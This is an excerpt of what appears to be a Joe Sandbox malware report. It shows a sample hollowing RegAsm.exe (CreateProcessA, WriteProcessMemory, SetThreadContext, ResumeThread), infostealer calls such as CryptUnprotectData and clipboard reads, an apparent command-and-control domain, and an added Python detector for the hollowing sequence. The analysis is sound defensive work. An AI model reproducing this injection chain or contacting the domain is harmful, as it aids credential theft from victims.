                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:3
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"
                        Imagebase:0xb60000
                        File size:46'832 bytes
                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:5
                        Start time:02:35:35
                        Start date:24/11/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                        Imagebase:0xe60000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true


                          Execution Graph

                          Execution Coverage:16.9%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:111
                          Total number of Limit Nodes:0
                          execution_graph (the rendered graph is not recoverable from the page; the node list it was built from encodes the following call structure)

                          Three entry points, 1572bf1, 1572bdc and 1572b88, all reach block 1572bbe and from there the same chain of wrapper functions. Each wrapper exists twice at adjacent addresses (both listed); every stage also has an edge to the exit block 1572edf, taken on failure.

                            1572bbe -> 1572805 / 1572810  CreateProcessA
                            1572c75 -> 15723f0 / 15723e8  Wow64SetThreadContext
                            1572cdf -> 1572670 / 1572678  ReadProcessMemory
                            1572d24 -> 15724c1 / 15724c8  VirtualAllocEx
                            1572d87 -> 1572581 / 1572588  WriteProcessMemory
                            1572dae -> 1572581 / 1572588  WriteProcessMemory (loops back to 1572dae)
                            1572e57 -> 1572581 / 1572588  WriteProcessMemory
                            1572e80 -> 15723f0 / 15723e8  Wow64SetThreadContext
                            1572eca -> 1572340 / 1572339  ResumeThread
                            1572edf  exit

                          Inside the wrappers the API call sites are 1572899 (CreateProcessA), 1572435 (Wow64SetThreadContext), 15726c3 (ReadProcessMemory), 1572508 (VirtualAllocEx), 15725d0 (WriteProcessMemory) and 1572380 (ResumeThread).
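The chain above is the process-hollowing sequence: create a child, read its memory, allocate and write into it (three write sites, one in a loop), set the thread context and resume. The following Python is an added example, not Joe Sandbox output: it turns that chain into an ordered-stage detector over a per-process API event stream. The event stream is constructed from the graph (API names and the wrapper addresses it lists); the process ids, the benign launcher trace with its addresses, and the Nt* alternatives in the stage table are assumptions made for the example.

```python
"""Flag the process-hollowing API sequence the execution graph above shows for
ZjH6H6xqo7.exe.

Added example, not Joe Sandbox output. The sample trace is constructed from
the graph: API names and the wrapper-function addresses it lists. The process
ids and the second, benign trace are invented for the example.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiEvent:
    pid: int
    api: str
    func: int  # address of the wrapper that made the call (graph node address)


# Stages of the pattern, in the order they must appear. Alternatives per stage
# cover the ANSI/Unicode and Wow64/native spellings; the Nt* names are an
# assumption about what an ETW or hook-based tracer would report.
HOLLOWING_STAGES = (
    ("create",  {"CreateProcessA", "CreateProcessW"}),
    ("alloc",   {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write",   {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("context", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume",  {"ResumeThread", "NtResumeThread"}),
)


def match_hollowing(events) -> dict:
    """Walk every process's calls in order and return {pid: [func, ...]} for each
    pid whose stream contains the five stages in sequence. Unrelated calls may
    sit between stages, and a stage may repeat (the graph shows three
    WriteProcessMemory sites, one in a loop) before the next stage starts."""
    progress = {}  # pid -> (index of the next stage to satisfy, matched funcs)
    hits = {}
    for ev in events:
        stage, trail = progress.get(ev.pid, (0, []))
        if stage == len(HOLLOWING_STAGES):
            continue  # already reported
        if ev.api in HOLLOWING_STAGES[stage][1]:
            trail = trail + [ev.func]
            stage += 1
        elif stage > 0 and ev.api in HOLLOWING_STAGES[stage - 1][1]:
            trail = trail + [ev.func]  # repeat of the stage just satisfied
        progress[ev.pid] = (stage, trail)
        if stage == len(HOLLOWING_STAGES):
            hits[ev.pid] = trail
    return hits


SAMPLE_PID = 1234  # constructed; the report does not print the sample's pid
SAMPLE_TRACE = [  # order and addresses as in the execution graph above
    ApiEvent(SAMPLE_PID, "CreateProcessA", 0x1572805),
    ApiEvent(SAMPLE_PID, "Wow64SetThreadContext", 0x15723F0),  # before any write
    ApiEvent(SAMPLE_PID, "ReadProcessMemory", 0x1572670),
    ApiEvent(SAMPLE_PID, "VirtualAllocEx", 0x15724C1),
    ApiEvent(SAMPLE_PID, "WriteProcessMemory", 0x1572581),  # via 1572d87
    ApiEvent(SAMPLE_PID, "WriteProcessMemory", 0x1572581),  # via 1572dae (loop)
    ApiEvent(SAMPLE_PID, "WriteProcessMemory", 0x1572581),  # via 1572e57
    ApiEvent(SAMPLE_PID, "Wow64SetThreadContext", 0x15723F0),
    ApiEvent(SAMPLE_PID, "ResumeThread", 0x1572340),
]

LAUNCHER_PID = 4321  # constructed benign launcher: creates a child and resumes it, no writes
LAUNCHER_TRACE = [
    ApiEvent(LAUNCHER_PID, "CreateProcessW", 0x401000),  # hypothetical address
    ApiEvent(LAUNCHER_PID, "ResumeThread", 0x401050),    # hypothetical address
]


def interleave(a, b) -> list:
    """Merge two per-process traces the way a system-wide tracer would deliver them."""
    out = []
    for i in range(max(len(a), len(b))):
        out += a[i:i + 1] + b[i:i + 1]
    return out


if __name__ == "__main__":
    for pid, trail in match_hollowing(interleave(SAMPLE_TRACE, LAUNCHER_TRACE)).items():
        print(f"pid {pid}: hollowing sequence at " + ", ".join(hex(f) for f in trail))
```

The report labels both context calls Wow64SetThreadContext, so the detector keys on whichever one follows the writes; the first call, made before any memory is written, does not advance the pattern and is simply skipped.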

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1572805-15728a5 2 15728a7-15728b1 0->2 3 15728de-15728fe 0->3 2->3 4 15728b3-15728b5 2->4 8 1572937-1572966 3->8 9 1572900-157290a 3->9 6 15728b7-15728c1 4->6 7 15728d8-15728db 4->7 10 15728c5-15728d4 6->10 11 15728c3 6->11 7->3 19 157299f-1572a59 CreateProcessA 8->19 20 1572968-1572972 8->20 9->8 12 157290c-157290e 9->12 10->10 13 15728d6 10->13 11->10 14 1572931-1572934 12->14 15 1572910-157291a 12->15 13->7 14->8 17 157291e-157292d 15->17 18 157291c 15->18 17->17 21 157292f 17->21 18->17 31 1572a62-1572ae8 19->31 32 1572a5b-1572a61 19->32 20->19 22 1572974-1572976 20->22 21->14 24 1572999-157299c 22->24 25 1572978-1572982 22->25 24->19 26 1572986-1572995 25->26 27 1572984 25->27 26->26 28 1572997 26->28 27->26 28->24 42 1572aea-1572aee 31->42 43 1572af8-1572afc 31->43 32->31 42->43 46 1572af0-1572af3 call 1570b04 42->46 44 1572afe-1572b02 43->44 45 1572b0c-1572b10 43->45 44->45 47 1572b04-1572b07 call 1570b04 44->47 48 1572b12-1572b16 45->48 49 1572b20-1572b24 45->49 46->43 47->45 48->49 52 1572b18-1572b1b call 1570b04 48->52 53 1572b36-1572b3d 49->53 54 1572b26-1572b2c 49->54 52->49 56 1572b54 53->56 57 1572b3f-1572b4e 53->57 54->53 58 1572b55 56->58 57->56 58->58
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01572A46
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 6efbce66c035facf31f3205772b2cfa692420a56c864e9830918d1597dda55e5
                          • Instruction ID: ec7c7c04bdf8e57d679649265ec3c5d8e8ecd9baadea5c64cd6d8d4cb7dfb606
                          • Opcode Fuzzy Hash: 6efbce66c035facf31f3205772b2cfa692420a56c864e9830918d1597dda55e5
                          • Instruction Fuzzy Hash: 81A17E71D00219CFDB25DF69D8417EDBBB2BF48314F14856AE818AB280DB749985CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 60 1572810-15728a5 62 15728a7-15728b1 60->62 63 15728de-15728fe 60->63 62->63 64 15728b3-15728b5 62->64 68 1572937-1572966 63->68 69 1572900-157290a 63->69 66 15728b7-15728c1 64->66 67 15728d8-15728db 64->67 70 15728c5-15728d4 66->70 71 15728c3 66->71 67->63 79 157299f-1572a59 CreateProcessA 68->79 80 1572968-1572972 68->80 69->68 72 157290c-157290e 69->72 70->70 73 15728d6 70->73 71->70 74 1572931-1572934 72->74 75 1572910-157291a 72->75 73->67 74->68 77 157291e-157292d 75->77 78 157291c 75->78 77->77 81 157292f 77->81 78->77 91 1572a62-1572ae8 79->91 92 1572a5b-1572a61 79->92 80->79 82 1572974-1572976 80->82 81->74 84 1572999-157299c 82->84 85 1572978-1572982 82->85 84->79 86 1572986-1572995 85->86 87 1572984 85->87 86->86 88 1572997 86->88 87->86 88->84 102 1572aea-1572aee 91->102 103 1572af8-1572afc 91->103 92->91 102->103 106 1572af0-1572af3 call 1570b04 102->106 104 1572afe-1572b02 103->104 105 1572b0c-1572b10 103->105 104->105 107 1572b04-1572b07 call 1570b04 104->107 108 1572b12-1572b16 105->108 109 1572b20-1572b24 105->109 106->103 107->105 108->109 112 1572b18-1572b1b call 1570b04 108->112 113 1572b36-1572b3d 109->113 114 1572b26-1572b2c 109->114 112->109 116 1572b54 113->116 117 1572b3f-1572b4e 113->117 114->113 118 1572b55 116->118 117->116 118->118
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01572A46
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 7cdca0e1871e52f384acb20117d96d68ecd4844e25b08442614d48dd9e721525
                          • Instruction ID: 280f4a2ea2e5390b3e41f3dd2a28cb19c91409d9786168d4ef9ee00bae79a55f
                          • Opcode Fuzzy Hash: 7cdca0e1871e52f384acb20117d96d68ecd4844e25b08442614d48dd9e721525
                          • Instruction Fuzzy Hash: 38917D71D00219CFEB25DF69D841BEDBBB2BF48314F14856AE818AB280DB749985CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 120 1572581-15725d6 122 15725e6-1572625 WriteProcessMemory 120->122 123 15725d8-15725e4 120->123 125 1572627-157262d 122->125 126 157262e-157265e 122->126 123->122 125->126
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01572618
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c3916b6c750b10566ea9fb61a28b2cfc146b22a38addca504583b6e3f7fc6f63
                          • Instruction ID: 1d099eda8dcaac23ca8fd46fad520e548b21ff0a1dc21379bb7ace44ea0d80ce
                          • Opcode Fuzzy Hash: c3916b6c750b10566ea9fb61a28b2cfc146b22a38addca504583b6e3f7fc6f63
                          • Instruction Fuzzy Hash: F02126B5D103499FDB10DFA9C985BEEBBF5FF88310F10842AE919A7250D7789944CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 130 1572588-15725d6 132 15725e6-1572625 WriteProcessMemory 130->132 133 15725d8-15725e4 130->133 135 1572627-157262d 132->135 136 157262e-157265e 132->136 133->132 135->136
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01572618
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c58126a648accce2831734a5918cadf585cef107b123caeeb54a01cef6e5452d
                          • Instruction ID: 75113a9aa4b42ff5b2f36924d3294e13d98f2bf544e672d1173ca0542e6a9336
                          • Opcode Fuzzy Hash: c58126a648accce2831734a5918cadf585cef107b123caeeb54a01cef6e5452d
                          • Instruction Fuzzy Hash: 8D211B75D003499FDB10DFA9C945BDEBBF5FF48310F10842AE519A7240D7789944CBA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 140 1572670-1572705 ReadProcessMemory 143 1572707-157270d 140->143 144 157270e-157273e 140->144 143->144
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 015726F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 1a65a17e8a4c06de91ed6cd4d27ac4802bf3dac7b734b7e236ab9586105a40a6
                          • Instruction ID: 64ecddd8a566689a16af7af6977e094aed8c850bae0cd43daa7995b8e24dca8e
                          • Opcode Fuzzy Hash: 1a65a17e8a4c06de91ed6cd4d27ac4802bf3dac7b734b7e236ab9586105a40a6
                          • Instruction Fuzzy Hash: 202124B1C003499FCB10CFA9C885AEEBBF5FF88310F10882EE519A7250C7389941CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 148 15723e8-157243b 150 157243d-1572449 148->150 151 157244b-157247b Wow64SetThreadContext 148->151 150->151 153 1572484-15724b4 151->153 154 157247d-1572483 151->154 154->153
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0157246E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: d36ffb0cfa68c1bb295c9705e994b1871f87a4804da05feb57372bf02eed5ab4
                          • Instruction ID: 5e0d0871f992ad9f74dacf0dab9c7876a25f6051497bfb9d3d1eeeb0e8c524ba
                          • Opcode Fuzzy Hash: d36ffb0cfa68c1bb295c9705e994b1871f87a4804da05feb57372bf02eed5ab4
                          • Instruction Fuzzy Hash: AE2100B1D002098FDB14DFAAC485BEEBBF5EF89324F10842AD559A7240DB789945CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 158 15723f0-157243b 160 157243d-1572449 158->160 161 157244b-157247b Wow64SetThreadContext 158->161 160->161 163 1572484-15724b4 161->163 164 157247d-1572483 161->164 164->163
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0157246E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 881ca8affd10d1323463eae007032877336d9368de574b848d3d5ca440cd1eaf
                          • Instruction ID: ee22af16f6cf79792771036364adbd6752036b1992775af80d80730c8de44593
                          • Opcode Fuzzy Hash: 881ca8affd10d1323463eae007032877336d9368de574b848d3d5ca440cd1eaf
                          • Instruction Fuzzy Hash: 9B2115B1D002098FDB14DFAAC485BEEBBF5FF88314F14842AD559A7240DB78A945CFA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 168 1572678-1572705 ReadProcessMemory 171 1572707-157270d 168->171 172 157270e-157273e 168->172 171->172
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 015726F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 91bdf457b1ddcc68c4a9e752617bc296d1e272e3dcf3212409016b60c3cb9598
                          • Instruction ID: 65ee72949be66ee14c48c9b2f8a220d815de1d7f6165eecafa144a6ffdfe454d
                          • Opcode Fuzzy Hash: 91bdf457b1ddcc68c4a9e752617bc296d1e272e3dcf3212409016b60c3cb9598
                          • Instruction Fuzzy Hash: BC2138B1C003499FDB10DFAAC981AEEFBF5FF48310F10842AE519A7240C7789944CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 176 15724c1-1572543 VirtualAllocEx 179 1572545-157254b 176->179 180 157254c-1572571 176->180 179->180
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01572536
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 89d86cbfca2eca573d4c7bd5e5c6c1396e1de670a741f1cbfb8e37bb8168359d
                          • Instruction ID: db2224eddb0d2ff1d134e7f7e97a413bea2f09b03fb09ca9814d8bfea939e8bf
                          • Opcode Fuzzy Hash: 89d86cbfca2eca573d4c7bd5e5c6c1396e1de670a741f1cbfb8e37bb8168359d
                          • Instruction Fuzzy Hash: C7112672C002499FCB14DFA9D845AEEBFF5FF88314F24881AE519AB250C7799944CFA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 184 15724c8-1572543 VirtualAllocEx 187 1572545-157254b 184->187 188 157254c-1572571 184->188 187->188
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01572536
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d24e17269f618b9af028437490823ea24b5d35dddf9d9eac8b35751a93d8a6b4
                          • Instruction ID: 170ad60d75903820b3b505cfb7920225c2714ca9e3fe51154029ae94f2c5d0db
                          • Opcode Fuzzy Hash: d24e17269f618b9af028437490823ea24b5d35dddf9d9eac8b35751a93d8a6b4
                          • Instruction Fuzzy Hash: F41137718002499FCB10DFAAD845AEEFFF5FF88310F108819E519A7250C779A940CFA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 192 1572339-15723af ResumeThread 195 15723b1-15723b7 192->195 196 15723b8-15723dd 192->196 195->196
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: f62d3a096ac99345972c3b5a48771188d96fbba8346e9defd34958d8d14da3ae
                          • Instruction ID: 1f7c55bcf22ee1a92732b91ef0ea23bdbef87f3051d1ad22e4b0d3f8fefc5de8
                          • Opcode Fuzzy Hash: f62d3a096ac99345972c3b5a48771188d96fbba8346e9defd34958d8d14da3ae
                          • Instruction Fuzzy Hash: 1C1128B1D003488FDB14DFAAD5457EEFBF5EF88324F20882AD519A7250C7799944CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 200 1572340-15723af ResumeThread 203 15723b1-15723b7 200->203 204 15723b8-15723dd 200->204 203->204
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2074403070.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1570000_ZjH6H6xqo7.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 94b4d318a0119b87900cd9330563cf65f9f1bf09f7cdb1c0ef717b55f85dcf52
                          • Instruction ID: 67d863dd7591eaac5f390cf007069ba652629a89c0dd92843fda5ec49deda8ce
                          • Opcode Fuzzy Hash: 94b4d318a0119b87900cd9330563cf65f9f1bf09f7cdb1c0ef717b55f85dcf52
                          • Instruction Fuzzy Hash: DC113AB1D003488FDB14DFAAC4457EEFBF5EF88314F208419D519A7240CB79A944CBA1

                          Execution Graph

                          Execution Coverage:8.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:66.8%
                          Total number of Nodes:238
                          Total number of Limit Nodes:19
                          execution_graph (the rendered graph is not recoverable from the page; the node listing it was built from is summarised here and is cut off at the end of the page after node 441f63). Functions that resolve to API calls, grouped as the graph groups them:

                            4192c3 -> 419477  CryptUnprotectData
                            4228e0 -> 4229f0 -> 440dc0  LdrInitializeThunk
                            42d30b -> 42d3db FreeLibrary -> 42d3fd, 42d460  GetComputerNameExA (twice)
                            430969  CoSetProxyBlanket
                            40d9cc -> 4251d0, 425440, 4277c0, 427c90, 4297d0 (string and heap helpers: LdrInitializeThunk via 43e420/440c20/441360, RtlAllocateHeap at 43bb54, RtlFreeHeap at 43bbd2) -> 433a50: OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
                            408a70: SHGetSpecialFolderPathW, GetCurrentThreadId, GetCurrentProcessId, GetForegroundWindow, CoInitializeEx (40cd40), FreeLibrary (43e355), ExitProcess (408c1a)
                            40cdb0 -> 439250: CoCreateInstance, SysAllocString, CoSetProxyBlanket, VariantInit, VariantClear, SysFreeString, GetVolumeInformationW
                            43e370: RtlReAllocateHeap, RtlAllocateHeap, RtlFreeHeap
                            40e4af  CoUninitialize
                            438ed0, 441050, 441cb0: LdrInitializeThunk only (listing truncated)
11325->11324 11326 43bb20 RtlAllocateHeap 11325->11326 11328 441df6 11326->11328 11331 441eae 11328->11331 11333 43e420 LdrInitializeThunk 11328->11333 11329 43bb70 RtlFreeHeap 11329->11324 11331->11329 11332->11325 11333->11331 11334 42eafb 11335 42eb30 11334->11335 11336 42ec3e 11335->11336 11338 43e420 LdrInitializeThunk 11335->11338 11338->11336 11339 42e3be 11340 42e38e FreeLibrary 11339->11340 11343 42e3c7 11339->11343 11342 42e7f9 11340->11342 11344 42e7d5 GetPhysicallyInstalledSystemMemory 11343->11344 11344->11342 11250 40d69e 11251 40d740 11250->11251 11251->11251 11252 40d7ae 11251->11252 11254 43e420 LdrInitializeThunk 11251->11254 11254->11252 11345 40cd7e CoInitializeSecurity

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 439250: rendered graph omitted; basic blocks 439250-439a1b; API calls CoCreateInstance, SysAllocString, CoSetProxyBlanket, VariantInit, VariantClear, SysFreeString, GetVolumeInformationW; subcalls 4402f0, 41fd50, 4084f0, 408440, 408450.
                          APIs
                          • CoCreateInstance.OLE32(00443678,00000000,00000001,00443668,00000000), ref: 0043935D
                          • SysAllocString.OLEAUT32(194B1B42), ref: 00439420
                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043946A
                          • SysAllocString.OLEAUT32(194B1B42), ref: 004394BE
                          • SysAllocString.OLEAUT32(194B1B42), ref: 0043957F
                          • VariantInit.OLEAUT32(?), ref: 004395EA
                          • SysFreeString.OLEAUT32(?), ref: 00439916
                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,8F59896D,00000000,00000000,00000000,00000000), ref: 00439947
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                          • String ID: 7o=m$89$C$Ig:e$\$hw$lc
                          • API String ID: 505850577-4291297616
                          • Opcode ID: 0d9db5b245d2ce6c81176f84728941803a693ae74ea654298c89b6ce03bbb13d
                          • Instruction ID: 4875b3428042338d19e7170f3aaea273ecd47b7a9897bebdcd795001d034bec3
                          • Opcode Fuzzy Hash: 0d9db5b245d2ce6c81176f84728941803a693ae74ea654298c89b6ce03bbb13d
                          • Instruction Fuzzy Hash: 10223276A183019FE314CF28C89176BBBE1EFCA314F14892DE5959B391D7B8D805CB86

                          Control-flow Graph

                          control_flow_graph 422d10: rendered graph omitted; basic blocks 422d10-42359d; subcalls 440c20, 418860, 43bb20 (RtlAllocateHeap wrapper), 43e420 (LdrInitializeThunk wrapper), 43bb70 (RtlFreeHeap wrapper), 4235a0, 408440, 4184c0, 408450.
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocateHeapInitializeThunk
                          • String ID: !@$($)$*$+$+$,$/$/$1$2$3$f
                          • API String ID: 383220839-3341998751
                          • Opcode ID: 0e7c90368221c0814dd1a174816d4e6c61afc9ccdfb36f4a8009d3125df19c50
                          • Instruction ID: 18a18858be2276d736ea764ddcbb21285169e24f3d603c0614fa0cb3e178f1e1
                          • Opcode Fuzzy Hash: 0e7c90368221c0814dd1a174816d4e6c61afc9ccdfb36f4a8009d3125df19c50
                          • Instruction Fuzzy Hash: 7532D03160C3908FD325DF28D48036EBBE1AB85314F588A6EE5D587392D7BD8945CB4B

                          Control-flow Graph

                          control_flow_graph 42e3be: rendered graph omitted; basic blocks 42e38e-42f251; API calls FreeLibrary, GetPhysicallyInstalledSystemMemory; subcalls 4402f0, 408290, 41fd50, 409130.
                          APIs
                          • FreeLibrary.KERNEL32(?), ref: 0042E3B1
                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(00000000), ref: 0042E7DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeInstalledLibraryMemoryPhysicallySystem
                          • String ID: *XJl$YwS9$xtNw
                          • API String ID: 2745378098-2076723864
                          • Opcode ID: 11e01c268bc6cc07dac0ff966c06403923485280336a2349d59ef7a7537905d3
                          • Instruction ID: 0cb95c5ddde5167c2878493bc37a8644eb6a7979be790ba108b356da41a9ce9e
                          • Opcode Fuzzy Hash: 11e01c268bc6cc07dac0ff966c06403923485280336a2349d59ef7a7537905d3
                          • Instruction Fuzzy Hash: FD220970608B918FD729CF3694607A3BBE2AF57304F58886EC0DB87792D739A406CB55

                          Control-flow Graph

                          control_flow_graph 40cdb0: rendered graph omitted; basic blocks 40cdb0-40d18a; subcalls 408a00, 439250, 40bb10.
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 1BE*$5697ED7B3A758717FEE815EB403F5D54$T1S7$\W$sector-essay.cyou$xr
                          • API String ID: 0-1795187820
